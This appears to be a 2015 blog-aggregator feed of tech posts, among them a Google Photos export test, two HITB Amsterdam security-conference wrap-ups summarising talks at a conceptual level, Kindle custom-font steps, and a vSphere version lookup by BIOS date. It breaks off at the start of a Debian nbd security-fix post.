Time itself seems to have disappeared. I have no way of telling how long I have been in this hangar. Even my heartbeat is gone! Am I going mad? Have I been locked up for years or only a few seconds? How can I know?

A neon light suddenly flickers on. A door closes. Footsteps. Two human beings approach. Friend or foe? I hardly care; I have to get out of here.
— Help me! I'm here! Please!
But, of course, I emit no sound.

The two silhouettes come closer and stop in front of me. Two women in work clothes, caps screwed onto their heads. I try to focus my gaze on them, to make them understand that I exist.
— Is it this one? asks the taller of the two, pointing at my neighbour on the right.
— Yes, the other replies. The visual sensors are failing.
— Take them out, we'll see what we can do at the workshop! And replace the sensors with the ones from this one! It's a model that never goes out and is used for spare parts.

I hear a scraping on the floor. Out of the corner of my eye, I see them dragging a metal stepladder towards me. The face of the smaller one suddenly appears in my field of vision. Her nose almost touches mine. She is holding a powered screwdriver, which she brings towards my eye. I scream, I struggle. The tip of the screwdriver fills my field of vision, a small motor noise followed by a grinding sound. Black.

I am now plunged into absolute darkness. I hear the squeak of the stepladder being moved, the sound of the screwdriver.
— There, at least this one is operational.
— Perfect, let's take the sensor to the workshop.
Breathing. Equipment being put away, followed by footsteps moving off and the door closing. Black.

I am alone in absolute darkness. I would like to cry, to shiver, even just to feel. All I have is the dark…
— Eva…

 

Photo by 7th Army JMTC.

Thank you for taking the time to read this freely-paid post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

Flattr this!

by Lionel Dricot at June 01, 2015 04:09 PM

Dries Buytaert

State of Drupal presentation (May 2015)

I gave my State of Drupal presentation at DrupalCon Los Angeles in front of 3,000+ attendees. In case you didn't attend DrupalCon Los Angeles, you can watch the recording of my keynote or download a copy of my slides (PDF, 77 MB).

In the first part of the keynote, I talked about the history of the Drupal project, some of the challenges we overcame, and some of the lessons learned. While I have talked about our history in the past, it had been 6 years ago at DrupalCon Washington DC in 2009. In those 6 years, the Drupal community has grown so large that most people in the community don't know where we came from. Understanding the history of Drupal is important; it explains our culture, it holds us together in challenging times and provides a compass for where we are heading.

In the middle part of the keynote, I talked about what I believe is one of our biggest challenges: motivating more organizations to contribute more meaningfully to Drupal's development. Just as it is important to understand the history of Drupal, talking about the present is an important foundation for everyone in the community. It is hard to grow without the context of our current state.

In the third and last part of the keynote, I looked forward, talked about my vision for the big reverse of the web and how it relates to Drupal. The way the web is evolving provides us with an opportunity to better understand our sites' visitors or users and to build one-to-one relationships, something that much of our society has lost with the industrial revolution. If the web evolves the way I think it will, it will be both life changing and industry changing. While it won't be without concerns, we have a huge opportunity ahead of us, and Drupal 8 will help us build towards that future.

I'm proud of where we came from and excited for where we are headed. Take a look at the keynote if you want to learn more about it.

by Dries at June 01, 2015 02:27 PM

May 30, 2015

Ruben Vermeersch

Google Photos - Can I get out?

Google Photos

Google Photos came out a couple of days ago and well, it looks great.

But it begs the question: what happens with my photos once I hand them over? Should I want to move elsewhere, what are my options?

Question 1: Does it take good care of my photos?

Good news: if you choose to back up originals (the non-free version), everything you put in will come back out unmodified. I tested this with a couple of different file types: plain JPEGs, RAW files and movies.

Once uploaded, you can download each file one-by-one through the action buttons on the top-right of your screen:

Photo actions

Downloaded photos have matching checksums, so that’s positive. It does what it promises.

Update: not quite, see below

Question 2: Can I get my photos out?

As mentioned before there’s the download button. This gives you one photo at a time, which isn’t much of an option if you have a rather large library.

You can make a selection and download them as a zip file:

Bulk download

Only downside is that it doesn’t work. Once the selection is large enough, it silently fails.

There is another option, slightly more hidden:

Show in Google Drive

You can enable a magic “Google Photos” folder in the settings menu, which will then show up in Google Drive.

Combined with the desktop app, it allows you to sync back your collection to your machine.

I once again did my comparison test. See if you can spot the problem.

Original file:

$ ls -al _MG_1379.CR2 
-rwxr-xr-x@ 1 ruben  staff  16800206 Oct 10  2012 _MG_1379.CR2*
$ shasum -a 256 _MG_1379.CR2 
fbfb86dac6d24c6b25d931628d24b779f1bb95f9f93c99c5f8c95a8cd100e458  _MG_1379.CR2

File synced from Google Drive:

$ ls -al _MG_1379.CR2 
-rw-------  1 ruben  staff  1989894 May 30 18:38 _MG_1379.CR2
$ shasum -a 256 _MG_1379.CR2 
0769b7e68a092421c5b8176a9c098d4aa326dfae939518ad23d3d62d78d8979a  _MG_1379.CR2

My 16 MB RAW file has been compressed into something under 2 MB. That’s… bad.
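
If you want to verify an entire library rather than checking files one by one, a short script can walk the originals and compare checksums against the Drive-synced copy. A rough sketch, assuming Python 3; the two folder paths are placeholders you would adapt:

#!/usr/bin/env python3
# Compare SHA-256 checksums of every file present in both directory trees.
import hashlib, os, sys

def sha256(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(1 << 20), b''):
            h.update(chunk)
    return h.hexdigest()

originals, synced = sys.argv[1], sys.argv[2]   # e.g. ~/Pictures and the synced "Google Photos" folder
for root, _, files in os.walk(originals):
    for name in files:
        src = os.path.join(root, name)
        dst = os.path.join(synced, os.path.relpath(src, originals))
        if not os.path.exists(dst):
            print('MISSING :', name)
        elif sha256(src) != sha256(dst):
            print('MODIFIED:', name)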

Question 3: What about metadata?

Despite all the machine learning and computer vision technology, you’ll still want to label your events manually. There’s no way Google will know that “Trip to Thailand” should actually be labeled “Honeymoon”.

But once you do all that work, can you export the metadata?

As it stands, there doesn’t seem to be any way to do so. No API in sight (for now?).

Update: It’s supported in Google Takeout. But that’s still a manual (and painful) task. I’d love to be able to do continuous backups through an API.

Recommendations

The apps, the syncing, the sharing, it works really really well. But for now it seems to be a one-way story. If you use Google Photos, I highly recommend you keep a copy of your photos elsewhere. You might want them back one day.

What I’d really like to see:

Keeping an eye on it.


Comments | @rubenv on Twitter

May 30, 2015 07:18 PM

May 29, 2015

Xavier Mertens

HITB Amsterdam Wrap-Up Day #2

HITB Goodies
I left Amsterdam after the closing keynote and have just arrived home. This is my quick wrap-up of the second day of Hack in the Box!

The second keynote was presented by John Matherly: “The return of the Dragons”. John is the guy behind Shodan, the popular device search engine. Shodan started because Nmap was not designed to scan the whole Internet; Shodan uses stateless scanning instead. Today, the technology makes it possible to scan one specific port across the Internet in less time than it takes to make a coffee. Shodan also lets security researchers request specific scans for their projects. While the search engine is of course used by attackers during reconnaissance, it can also be used for many other purposes, such as:

John on stage

John insisted on the hot topic of IoT with many examples. Such devices tend to be connected via mobile networks, which makes it very difficult to contact the owner to say “fix your shit”. Many IoT devices also completely ignore our privacy and can expose sensitive data about our lives and health. If you’re interested in IoT security, have a look at the iotdb on github.com, another project maintained by Shodan (Internet of Things nmap fingerprints). For sure, IoT devices are a pain and they will strengthen their position as a major threat in the near future.

After the first coffee break, I attended a talk by Filippo Valsorda and George Tankersley about Tor: “Non-hidden hidden services considered harmful: Attacks and detection”. Everybody knows Tor, but what about the underlying protocol? Hidden services are a Tor feature which provides bidirectional anonymity and supports generic services. They are identified with the .onion TLD. Well-known examples are drug markets ;-).

Filippo & George on stage

Services are published in a database that is a DHT (Distributed Hash Table), and the question is: how do we choose where to publish this database? The speakers explained the process of HSDir selection. Why is it critical? Hidden service users face a greater risk of de-anonymisation than regular Tor users. See the published slides for the details. The problem is that low latency implies correlation attacks (think of entry and exit nodes). You can of course run your own HSDir and it will receive a subset of hidden service look-ups from users (after a few days). This helps in mapping relatively popular hidden services. They explained what useful information can be collected by running your own HSDir (you can trust it if you run it yourself). Finally, as a conclusion, they presented the tool they developed to analyse Tor HSDirs (available here). Nice presentation; if you are interested in this topic, I recommend reading the slides, which contain a lot of details.

Then, back in track one, Lucas de Fulgentis presented “The Windows Phone Freakshow”. His research was based on the following process: installation of apps, extraction of binaries, decompilation and review. Guess what? He discovered a lot of bad stuff. Windows Phone apps can be based on two technologies: Silverlight or Windows Runtime. The result of his research is a kind of catalog of bad API usage that he calls “freaks”. A freak is just an example of vulnerable code.

Lucas on stage

The first freak presented was self-defending apps. A lack of binary protection results in an app that can be analysed, reverse-engineered and modified. This is possible due to a lack of anti-debugging, obfuscation and resource integrity checks (roughly 95% of the tested apps lack proper binary protection). There are tools like dofFuscator that help protect binaries. Keep in mind that binary protections only mitigate, but do not solve, binary attacks. The next freak: data transport security. This concerns the transmission of sensitive data over unencrypted channels. Common issues are: no HTTPS and vulnerability to MitM attacks. As an example, Lucas demonstrated how to abuse a vulnerable CNN application by changing or adding a breaking news item. More applications are vulnerable: LinkedIn, eBay, e-banking applications. A good tip is to use SSL everywhere. Windows Phone 8 automatically discards invalid certificates, but if the CA is compromised and the attacker generates malicious certificates, the problem remains! To protect against this, implement certificate pinning. Next freak: data storage security. WP8 supports BitLocker (AES-128) but… it is disabled by default (it can be enabled via an ActiveSync policy). Physical memory attacks on the device allow access to some content. Do we really need sensitive data on our mobile devices? Data can be stored in 3 locations: the file system, an external SD card or the cloud. A common issue with credentials? They are stored in plain text! Use the DataProtection API; there is also a PasswordVault class available. The other freaks reviewed by Lucas: data leakage (involuntary data disclosure due to a side effect), authentication and authorisation and, last but not least, client-side injection. For this last point, a key rule is to never trust data from the wild. “All input is evil”, as Lucas said. Using an undocumented IPC call (Shell_PostMessageToast), Lucas demonstrated how to bypass the 4-digit PIN code protection in the Dropbox application. Being a contributor to the OWASP Mobile Security Project, Lucas demonstrated not only the vulnerabilities but also the countermeasures available to developers. Very nice talk!

After a good lunch and interesting discussions with peers, the last half-day started with Julien Vehent from Mozilla, who presented “Mozilla Investigator: Distributed and real-time digital forensics at the speed of the cloud”. MIG = “Mozilla InvestiGator”. Mozilla has approximately 15,000 servers.

Mozilla InvestiGator

It’s a challenge to monitor all of this and perform security operations. Julien explained what IOCs (“Indicators of Compromise”) are: IP addresses, filenames, hashes, URLs, domains, … The good point: they can be shared! A security incident can also be caused by internal mistakes. Do you know the unfortunate commit?

$ git commit -a . && git push github master

Passwords or credentials can be leaked in this case. How do you assess the impact on the complete infrastructure, spanning thousands of servers? Mozilla’s goal is to build a safer Internet with a strong startup/incubator mindset. As Julien said, they experiment and fail fast. The current infrastructure consists of 400+ active websites, a dozen offices, remote workers, 2 data centers and tons of AWS accounts. How do you do incident response in such an environment? (It’s like looking for a needle.) For Julien, the OpSec problems are:

The faster we can investigate, the more we will find. Mozilla followed this principle: “If you can’t find the right tool, write your own”. Julien demonstrated some uses of MIG.

Example 1: Locating a cron job that contains a password:

$ mig file -e 30s -path /etc/cron.d -content "badpassword"

Example 2: Is that botnet IP connected anywhere?

$ mig netstat -e 20s -ci 78.204.52.20

Each server runs an agent connected to a RabbitMQ relay. MIG is light, written in Go, ships as one static binary, and its config is pushed by tools like Puppet. Julien reviewed all the security controls in place to let the agent work safely: intensive use of PGP, no raw data returned to the server, ACLs. It looks like a very powerful tool! MIG is available here.

The next talk is the kind everybody expects at a security conference: it focuses on infrastructure everybody uses in daily life: parking systems. Jose Antonio Guasch started this research a few years ago in his spare time and fully compromised the parking system of a well-known vendor (not disclosed). His talk was titled “Yes Parking: Remotely Owning ‘Secure’ Parking Systems”.

Jose on stage

This time, no SCADA devices and no complex technical skills, just classic vulnerabilities like the ones we find on plenty of vulnerable web servers. But why focus on public parkings? They have complex infrastructures and there is money involved (a lot of it!). For Jose, a kid’s dream was to play with the parking gates just by clicking a button, and he succeeded. Everything started with a simple login page. The rest of the research followed the same structure as a classic pentest: information gathering, enumeration, analysis, exploitation, etc. A parking system is based on a few main components:

Behind those components, we find dumb personal computers connected to a network. Jose analysed different versions of the application (which changed after the original company was taken over by another one).

For the old version, it was a piece of cake: an indexable directory on the management server exposed a /backup directory with database dumps; restore the latest one, get credentials and use them. Game over!

The newest version was more difficult to pwn but remained vulnerable: bad passwords (again), credit card numbers in clear text, the ability to record new voice messages, play with the gates, … Of course, a real attacker would play far more evil games: reselling monthly tickets and lists of credit card numbers, monitoring people, tracking license plates, … Jose’s advice to the application owners: don’t put anything online, harden your systems, don’t use default configurations and restrict access!

The last talk was presented by Marina Krotofil and Jason Larson: “What you always wanted and now can: Hacking chemical processes”. They talked about Industrial Control Systems: “IT” systems implemented in “physical” systems, where components convert analog signals (e.g. temperature, pressure) into digital ones. In traditional security, TLS is presented as the saviour of all things. But it’s different in industrial processes: the process can’t stop because of an IT issue. Can you imagine: crypto key invalid => stop the process? Industrial systems can be controlled without modifying the content of the message!

Marina & Jason on stage

After a five-minute SCADA 101 session (always useful), they came back to process manipulation. In some processes, the freshness of data is critical. They reviewed different types of attacks and their impact on a plant.

And for the closing keynote, the word was given to Runa A. Sandvik. She talked about “Bringing security and privacy to where the wild things are”. Runa’s talk addressed the security community but without technical content, only nice facts and ideas. She has worked on projects like Tor and for the Freedom of the Press Foundation.

Runa on stage

What’s the link with IoT and mobile phones? Back in 2010, we discovered that apps were leaking data to external services (e.g. the Pandora music app). Another example: a rifle running Linux and connecting to apps… Drones paired with a mobile phone, wireless toys, etc. Keep in mind: “Just because you can does not mean you should”. So why do we do it? Excitement? Innovation? Managing expectations. Nobody takes care of updates on mobile phones. What if the OS reaches its end of life? No more updates? Start from a baseline and build on it. The baseline changes over time… Today the new baseline has many more options (the example given was cars). Why don’t we have the same reflex with electronic devices? “NSA-proof” is a term created by journalists. What does it really mean? We, as a community, can help journalists understand this better. But hackers also make mistakes with logos, brands, … Think about the latest one, VENOM… We can do better! Security vs privacy: new roles are appearing which replace the word security with privacy: privacy analysts, privacy engineers, … We need more transparency, but often there is a lack of context. Example: the app permissions screen on Android. Facebook needs access to the microphone? But in which context? Where do we go from here? How do we educate people? Be responsible (see the story of Chris Roberts, who hacked a plane). Two interesting initiatives mentioned by Runa: I Am The Cavalry and BuildItSecure.ly. I really liked her keynote, which contained interesting ideas to keep in mind and to share!

All the conference material is already online; I suggest you download the slides and read them, great content! Next step for me: BSidesLondon next Wednesday!

by Xavier at May 29, 2015 08:48 PM

Frank Goossens

Music from Our Tube: Dutronc’s Responsable

Delicious French sixties pop by Jacques Dutronc on wikipedia, either in this “revisit” by Plaisirs de France or the original embedded here;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Keep on dancing kids!

by frank at May 29, 2015 06:17 AM

May 28, 2015

Xavier Mertens

HITB Amsterdam Wrap-Up Day #1

HITB Track 1
The HITB crew is back in the beautiful city of Amsterdam for a new edition of their security conference. Here is my wrap-up of the first day!

The opening keynote was assigned to Marcia Hofmann, who worked for the EFF (the Electronic Frontier Foundation). Her keynote title was: “Fighting for Internet Security in the New Crypto Wars”. The EFF has always fought for more privacy, and she reviewed the history of encryption and all the bad stories around it. It started with a statement: “We need strong encryption but we need some backdoors”. Ever since encryption algorithms were developed, developers have received pressure from governments to implement backdoors or use weak(er) keys to allow interception… just in case! This has already happened before and will happen again.

Marcia on stage

In a prologue, Marcia explained how everything started with the development of RSA and Diffie-Hellman. For some other algorithms like DES, it was clear that the development team was very close to the NSA, who deliberately asked for weaker keys to help them brute-force encrypted traffic. In the 80’s and 90’s, cryptography was developed more and more by the private sector and academic research. Personal computers rose in popularity and people started to encrypt their data. Then came the famous PGP, key escrow and the Clipper chip. Marcia also explained CALEA (the “Communications Assistance for Law Enforcement Act”): technology must be designed in such a way that the FBI can intercept communications if needed (of course, with a proper warrant). Then came the restrictions on exporting encryption outside the US. It was a good opportunity for Marcia to say a few words about the Wassenaar Arrangement and the recent proposal to prevent the export of intrusion software and surveillance technology. Today, in the Snowden era, governments are seen as attackers. The NSA was able to tamper with all our data and also infiltrated major Internet players. What about the future? What should happen and what should we do? Marcia took a pendulum as an example: various forces influence the way a pendulum moves. In the same way, different external pressures affect how security is designed:

I hope that the keynote helped a lot of people to open their eyes about our privacy!

After the morning coffee break, I went to the second track to follow Pedram Hayati’s presentation: “Uncovering Secret Connections Using Network Theory and Custom Honeypots”. The first part gave background information about our classic defence model and honeypots. In a traditional security model, the perimeter is very hardened, but once the intruder is inside, nothing can stop him. We keep the focus on making the perimeter stronger. This comes from the physical security approach (think of old castles), and attackers put all their effort into bypassing a single high barrier. Our second problem? We enter a battle without knowing the attackers. This is the idea of active defence and protection. Active defence is defined as:

A security approach that actively increases the cost of performing an attack in terms of time, effort and required resources to the point where a successful compromise against a target is impossible.

Pedram on stage

To achieve this, we need:

The foundation is knowing the attacker! So what tools do we have? Our logs of course, but honeypots can be very helpful! In the second part, Pedram explained what honeypots are… “a decoy system to lure attackers”. They increase the cost of a successful attack: the attacker will spend time in the honeypot. It is fundamental that it looks legitimate, but it has signatures and behaviour; that’s why it must be fully configurable to lure the attacker. Some principles:

The next section was the experiment. Pedram deployed 13 honeypots at major cloud providers (AWS, Google), distributed across the Internet. They mimic a typical server and their IP addresses were not published (no domain mapping). The goal was to identify SSH attacks, discover attack profiles per region and the relations between them. How long until the first infection was detected? On average, less than 10 minutes! The collected data was analysed and it was possible to classify the attackers into three categories:

Pedram also explained how he generated nice statistics about the attackers, their behaviour and locations. To conclude, he compared the attackers to somebody throwing bricks through windows. How do we react? We can take action to prevent this guy from throwing more bricks, or we can buy bullet-proof windows. It’s the same with information security. Try to get rid of the attackers!

My next choice was a talk about mobile phone operators: “Bootkit via SMS: 4G Access Level Security Assessment”, presented by Timur Yunusov and Kirill Nesterov. Today, 3G/4G networks are not only used by people to surf Facebook but are increasingly used for M2M (“machine to machine”) communications. They explained that many operators have GGSNs (“Gateway GPRS Support Nodes”) facing the Internet (just use Shodan to find some). A successful attack against such devices can lead to DoS, information leaks, fraud or APN guessing.

Timur & Kirill on stage

BTW, did you know that, when you are out of credit, telcos block TCP traffic but UDP remains available? Time to use your UDP VPN! But attacking the network in this way is not new, so the speakers focused on another path: attacking the network via SMS! On the hardware side, they investigated some USB modems used by many computers. Such devices are based on Linux/Android/Busybox and have many interesting features. Most of them suffer from basic vulnerabilities like XSS, CSRF or the ability to brick the device. They showed a demo video with an XSS attack and a CSRF to steal the user password. If you can own the device, the next challenge is to own the computer using the USB modem! To achieve this, they successfully turned the modem into an HID device. It is first detected as a classic RNDIS device, then as a keyboard, and operates like a Teensy to inject keystrokes. You own the modem and the computer, but what about the SIM card? They explained in detail how they achieved this step and ended with a demonstration in which they remotely cloned a SIM card and captured GSM traffic! The best advice they could give as a conclusion: always change your PIN code!

After lunch, Didier Stevens and I gave our workshop on iOS forensics. I therefore missed two talks, but my next choice was to listen to Bas Venis, a very young security researcher, who talked about browsers: “Exploiting Browsers the Logical Way”. The presentation was based on “logic” bugs: no need for debuggers and other complicated tools to find such vulnerabilities. Bas explained the Chrome URL spoofing vulnerability he discovered (CVE-2013-6636).

Bas on stage

Then he switched to the Flash player. The goal was to evade the sandbox. After explaining the different types of sandboxes (remote, local_with_file, local_with_network, local_trusted and application), he explained that the URL/URI logic is not rock solid in sandboxes, which led to CVE-2014-0535. The conclusion was that looking for logic bugs and using them has proven to be a sensible approach when trying to hack browsers. Sweet results can be found, and they do not require tools, just dedication and creativity. Just a remark about the quality of the video: it was almost unreadable on the big plasma screens installed in the room.

Finally, the first day ended with a rock star: Saumil Shah, who presented “Stegosploit: Hacking with Pictures”. This presentation is the next step in Saumil’s research on owning the user with pictures. In 2014 at hack.lu, he already presented “Hacking with pictures”. What’s new? Saumil insisted on the fact that “A good exploit is one delivered with style”. Pwning the browser can be complicated, so why not just find a simple trick to deliver the exploit? The first part was a review of the history of steganography, a technique used to hide a message inside a picture without visibly altering it. Then came the principle of GIFAR: a GIF file with a JAR file appended to it. Then webshells arose, embedding tags like “<?php>” or “<% … %>”. Finally, EXIF data was used (for example to deliver an XSS).

Saumil on stage

Stegosploit is not a new 0-day exploit with a nice name and logo. It’s a technique to deliver browser exploits via pictures. To achieve this, we need an attack payload and a “safe” decoder which can transform pixels into dangerous data. How?

How to decode in the browser? Using the HTML5 CANVAS (so, only available in modern browsers). The next step is to run the decoder automatically in the browser. To achieve this, we have IMAJS: depending on the tag used, a browser will either display an image or execute it. Why is this attack possible? Because browsers follow this principle:
Be conservative in what you send and liberal in what you receive. (Jon Postel)
Browsers accept unknown tags and get pwned! The talk ended with some nice demos of exploits popping up calc.exe or Meterpreter sessions. Keep an eye on this technique, it’s amazing to own a user!

This closed the first day! Note that slides are uploaded after each talk and available here.

by Xavier at May 28, 2015 09:08 PM

Mattias Geniar

Google Jump: VR For The Masses

The post Google Jump: VR For The Masses appeared first on ma.ttias.be.

They have already made commodity-class hardware in the cloud a standard, and their R&D team seems to be heading the same way for Virtual Reality, too.

From a cardboard Virtual Reality goggle to affordable VR recording. Impressive stuff.

GoPro's Jump-ready 360 camera array uses HERO4 camera modules and allows all 16 cameras to act as one. It makes camera syncing easy, and includes features like shared settings and frame-level synchronization.
Google Jump

If this works as simply as advertised, we'll be seeing a lot of VR content in the near future.

Is Virtual Reality on the web really the next step?

The post Google Jump: VR For The Masses appeared first on ma.ttias.be.

by Mattias Geniar at May 28, 2015 07:11 PM

Les Jeudis du Libre

Arlon, June 4, S01E03: Java gets the party going in Scala

Scala logo
On Thursday June 4 at 7pm, the Jeudis du Libre of Arlon offer you an opera in five acts on the Scala programming language:

On stage, the tenor will be Alexis Vandendaele, a Java developer at Sfeir with a passion for rising new technologies, web and otherwise. The goal of his talk is to give you an overview of Scala's capabilities in order to demystify it.

Venue: InforJeunes Arlon (1st floor), Place Didier 31, 6700 Arlon
For details and registration, it's here!
For further information, contact the ASBL 6×7.

by Didier Villers at May 28, 2015 07:26 AM

May 27, 2015

Frank Goossens

Firefox: how to enable the built-in tracking protection

Just read an article on BBC News that starts off with the AdBlock Plus team winning another case in a German court (yeay) and ends with a report on how Firefox also has built-in tracking protection which -for now- is off by default and somewhat hidden. To enable it, just open about:config and set privacy.trackingprotection.enabled to true. I disabled Ghostery for now, let’s see how things go from here.

by frank at May 27, 2015 04:46 PM

Autoptimize: video tutorial en Español!

The webempresa.com team contacted me a couple of days ago to let me know they created a small tutorial on the installation & basic configuration of Autoptimize, including this video of the process;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

The slowdown noticed when activating JS optimization is due to the relative cost of aggregating & minifying the JS. To avoid this overhead for each request, implementing a page caching solution (e.g. HyperCache plugin or a Varnish-based solution) is warmly recommended.

Muchas gracias Webempresa!

by frank at May 27, 2015 03:34 PM

May 26, 2015

Mattias Geniar

iOS9 Major Feature: Fixing The Shift Key

The post iOS9 Major Feature: Fixing The Shift Key appeared first on ma.ttias.be.

I may be an Apple fan, but I LOL'd at this major feature that leaked.

Alongside this, the company plans to tweak the keyboard to work better in both landscape and portrait keyboard mode and will make it easier to tell when the shift key is selected.

iOS 9 to reportedly support Force Touch, fix shift key and open up Apple Pay to Canada

If new OS details leak and they mention fixing the shift key, you're doing something wrong.

The post iOS9 Major Feature: Fixing The Shift Key appeared first on ma.ttias.be.

by Mattias Geniar at May 26, 2015 06:51 PM

Bert de Bruijn

which vSphere version is my VM running on?

(an update of an older post, now complete up to vSphere 6)

Your Linux runs on a VMware VM, but on which ESXi version? You can see for yourself: run "dmidecode" and look at lines 10, 11 and 12.
ESX 2.5 - BIOS Release Date: 04/21/2004 - Address 0xE8480 - Size 97152 bytes
ESX 3.0 - BIOS Release Date: 04/17/2006 - Address 0xE7C70 - Size 99216 bytes
ESX 3.5 - BIOS Release Date: 01/30/2008 - Address 0xE7910 - Size 100080 bytes
ESX 4 - BIOS Release Date: 08/15/2008 - Address 0xEA6C0 - Size 88384 bytes
ESX 4U1 - BIOS Release Date: 09/22/2009 - Address 0xEA550 - Size 88752 bytes
ESX 4.1 - BIOS Release Date: 10/13/2009 - Address 0xEA2E0 - Size 89376 bytes
ESXi 5 - BIOS Release Date: 01/07/2011 - Address 0xE72C0 - Size 101696 bytes

ESXi 5.1 - BIOS Release Date: 06/22/2012 - Address: 0xEA0C0 - Size: 89920 bytes
ESXi 5.5 - BIOS Release Date: 07/30/2013 - Address: 0xEA050 - Size: 90032 bytes
ESXi 6 - BIOS Release Date: 09/30/2014 - Address: 0xE9A40 - Size: 91584 bytes
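
If you want to automate the lookup, a small script can map the BIOS release date straight onto the table above. A minimal sketch, assuming Python 3 and that dmidecode is installed and run as root:

#!/usr/bin/env python3
# Map the BIOS release date reported by dmidecode to the ESX/ESXi version
# the VM booted on, using the dates listed above.
import subprocess

RELEASE_DATES = {
    '04/21/2004': 'ESX 2.5',
    '04/17/2006': 'ESX 3.0',
    '01/30/2008': 'ESX 3.5',
    '08/15/2008': 'ESX 4',
    '09/22/2009': 'ESX 4U1',
    '10/13/2009': 'ESX 4.1',
    '01/07/2011': 'ESXi 5',
    '06/22/2012': 'ESXi 5.1',
    '07/30/2013': 'ESXi 5.5',
    '09/30/2014': 'ESXi 6',
}

date = subprocess.check_output(['dmidecode', '-s', 'bios-release-date'], text=True).strip()
print(RELEASE_DATES.get(date, 'unknown version (BIOS date %s)' % date))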


NB These DMI properties are set at boot time. Even if your VM gets live-migrated to a host running a different vSphere version, your VM will keep the values it got from the host it booted on. What you see is the vSphere version of the host your VM booted on.

by Bert de Bruijn (noreply@blogger.com) at May 26, 2015 12:02 PM

Frank Goossens

Music from Our Tube: Daniel Lanois going drum&bass

As usual I heard this on KCRW earlier today: Daniel Lanois leaving his roots-oriented songwriting for some pretty spaced-out instrumentals with a jazz-like and sometimes straight drum & bass feel to them. This is “Opera”, live;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

You can watch, listen & enjoy more live “flesh & machine”-material in this live set on KCRW.

by frank at May 26, 2015 05:27 AM

May 25, 2015

Mattias Geniar

Custom Fonts On Kindle Paperwhite First Generation

The post Custom Fonts On Kindle Paperwhite First Generation appeared first on ma.ttias.be.

I have something to admit: I'm a bit obsessive when it comes to fonts.

Nobody notices it, but this blog has changed more fonts in the last 6 months than I care to remember. Chaparral-Pro, Open Sans, HelveticaNeue-Light, ... they've all been used.

For me, a proper font makes or breaks a reading experience. In fact, I can still remember when just a few hours before launching our corporate website, I mentioned this "cool font I just came across" to Chris, and we decided to switch to HelveticaNeue-Light for the site, last minute.

Even our animated video got a font-change because of my obsessiveness. All for the better, of course.

So as much as the internet is about fonts and typography, kerning and whitespace, it sort of surprises me that the e-book world isn't. Or maybe it is, but it's only for the newer generation Ebooks.

I'm at my second Kindle now and I'd buy one again in a heartbeat. It's absolutely brilliant. But after a few years, you begin to notice the outdatedness of the device. It looks and feels old. To me, that's in large part because of the default font Caecilia.

Here's what it looks like.

caecilia_font_kindle

It looks bold and makes the device feel older than it really is.

On the Kindle, I've used that font for many years. Largely because I had no idea that I could change the font in the first place. But it's readable and there really isn't much bad about it. It gets the job done.

Here's what it looks like on the Kindle itself, as the cover page of Becoming Steve Jobs.

kindle-caecille

A very quick way of making the Kindle feel new again is by changing to the other built-in fonts, more specifically Palatino.

kindle-palatino

It's more in line with modern typography as seen on the web: a lighter font that vaguely resembles HelveticaNeue.

But the default font options are limited. There are 6 included in my Paperwhite. And because geeks will be geeks, I wanted a font I choose.

First, make sure you're on the 5.3.1 version. I've read some blogposts about alternative methods working on 5.3.1+ versions, but none of them seemed to work for me. Download the 5.3.1 binary image here.

Next disable WiFi on the PaperWhite, because the auto-upgrades will break this functionality. You can enable it again later on, after you've added the fonts.

To downgrade the Kindle (in case you need to) follow these steps;

  1. Download earlier update file from Amazon: Kindle Paperwhite 1 Update 5.3.1
  2. Disable wifi on your Paperwhite (airplane mode).
  3. Connect your Kindle Paperwhite to your computer (do not disconnect until the last step).
  4. Copy the bin file you downloaded in step 1 to root folder of Paperwhite.
  5. Wait at least 2 minutes after the copy has completed (the device needs to register the .bin internally).
  6. Push and hold power button until your Paperwhite restarts (the led blinks orange and light turns on at the screen).
  7. Wait until the Paperwhite has installed the upgrade (which is really a downgrade).
  8. Now you can DISCONNECT from your computer.

If you've done the steps right, the next time the Kindle boots it'll flash itself from the supplied .bin file.

kindle_downgrading

Once you're on 5.3.1, getting the fonts activated is pretty easy.

Connect to the device to your PC and do these steps;

  1. In the root of the Kindle, make a file called "USE_ALT_FONTS" with no content. (touch USE_ALT_FONTS)
  2. Make a folder called fonts and drop your favourite font in there, in 4 versions each: Regular, Italic, Bold, BoldItalic. The filename needs to include those versions in the suffix, see the example below.

    I downloaded the ChaparralPro font from Fontzone.

    ChaparralPro_fonts_kindle

  3. After you've uploaded the fonts, reboot your Kindle
  4. After it booted, go to search in the dashboard/home screen and type ;fc-cache as a command.

    That forces the Kindle to rebuild its font database. After 4-5 minutes, the device will flash white and reload its UI; that is the sign that the rebuild has finished. Take your time for this.

    The command will look like it completed instantly, but is still running in the background.

kindle-fc-cache
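
For reference, since the screenshot above doesn't say much in a text feed, the fonts folder from step 2 should end up looking roughly like this (the exact file names are an assumption, following the Regular/Italic/Bold/BoldItalic suffix convention described above):

fonts/ChaparralPro-Regular.ttf
fonts/ChaparralPro-Italic.ttf
fonts/ChaparralPro-Bold.ttf
fonts/ChaparralPro-BoldItalic.ttf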

Once it reboots, you'll find a lot more fonts available in the Font Selection window. Enabling the USE_ALT_FONTS flag also unlocks other, already installed, fonts on the device.

kindle_unlocked_font_selections

After the Kindle booted, I chose the new Chaparral Pro font, increased the font size by two steps above the default, and we're good to go.

kindle_chaparralpro

I'm really happy with the results: the Chaparral Pro font is very pleasing to read.

Here's a side-by-side comparison of the original, the on-board Palatino and the newly installed Chaparral Pro. Click on the image for a bigger view.

kindle_font_comparison

The photo quality is sloppy, as I took "screenshots" with my phone. That means the angle is off every time and the alignment just downright sucks. But it gets the message across.

I'm hoping the next e-reader I buy has simpler options for managing custom fonts and takes its typography more seriously.

The post Custom Fonts On Kindle Paperwhite First Generation appeared first on ma.ttias.be.

by Mattias Geniar at May 25, 2015 09:03 PM

May 24, 2015

Wouter Verhelst

Fixing CVE-2015-0847 in Debian

Because of CVE-2015-0847 and CVE-2013-7441, two security issues in nbd-server, I've had to prepare updates for nbd, for which there are various supported versions: upstream, unstable, stable, oldstable, oldoldstable, and oldoldstable-backports. I've just finished uploading security fixes for the various supported versions of nbd-server in Debian. There are various relevant archives, and unfortunately it looks like they all have their own way of doing things regarding security:

